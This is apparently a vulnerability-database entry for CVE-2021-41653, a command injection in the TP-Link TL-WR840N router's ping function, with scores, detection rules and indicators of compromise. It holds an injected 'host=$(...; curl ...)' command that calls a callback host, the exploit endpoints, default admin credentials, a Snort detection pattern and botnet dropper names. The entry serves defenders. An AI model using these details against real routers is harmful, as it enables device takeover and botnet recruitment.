CVE-2021-41653
published 2021-11-13


Priority: P1 · 90 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 77.47% (99.5th percentile)
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.

Affected (1 range)

Vendor: tp-link
Product: tl-wr840n_firmware
Version range: <= tl-wr840n(eu)_v5_171211
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

filename: tshit.sh
cookie: Authorization=Basic YWRtaW46YWRtaW4=
path: /cgi?2
path: /cgi?7
command: host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
Snort/Suricata rule (Emerging Threats):
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)"; flow:established,to_server; http.request_line; content:"POST /cgi?2"; startswith; fast_pattern; http.request_body; content:"|5b|IPPING|5f|DIAG|23|"; nocase; content:"host="; distance:0; nocase; pcre:"/^(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; reference:url,k4m1ll0.com/cve-2021-41653.html; reference:url,www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; reference:cve,2021-41653; classtype:attempted-admin; sid:2034677; rev:2; metadata:attack_target Networking_Equipment, created_at 2021_12_11, cve CVE_2021_41653, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_11;)
  • The exploit targets the POST /cgi?2 endpoint with an [IPPING_DIAG#...] body block whose 'host=' parameter carries the injected command; a second request to POST /cgi?7 triggers execution.
  • The Snort/ET rule (sid:2034677) matches 'POST /cgi?2' in the request line together with '[IPPING_DIAG#' and 'host=' in the body, followed by shell metacharacters (backtick, semicolon, pipe, etc.) checked via PCRE.
  • Exploitation requires authentication; attackers use default credentials (admin:admin, Base64: YWRtaW46YWRtaW4=) in the Authorization cookie. Monitor for logins with default credentials followed by a POST to /cgi?2.
  • The malicious dropper script is named 'tshit.sh'; its download and execution on a TP-Link router is a strong indicator of compromise. The script also blocks connections to commonly targeted ports to keep out competing botnets.
  • MANGA/Dark Mirai payload binaries use the naming patterns 'eh.<arch>' (e.g., eh.arm5, eh.mips, eh.x86) and 'Dark.<arch>' / 'dark.<arch>'. The presence of these filenames on a Linux/IoT device indicates infection.
  • FortiGuard IPS signatures 'TP-Link.HTTP.Management.Code.Execution' and 'TP-Link.Home.Wifi.Router.CGI.Referer.Command.Injection' can generically detect this attack class.
  • The Check Point IPS signature 'TP-Link TL-WR840N Router Command Injection (CVE-2021-41653)' provides network-level detection.

CVSS provenance

NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
VulnCheck: 9.8 CRITICAL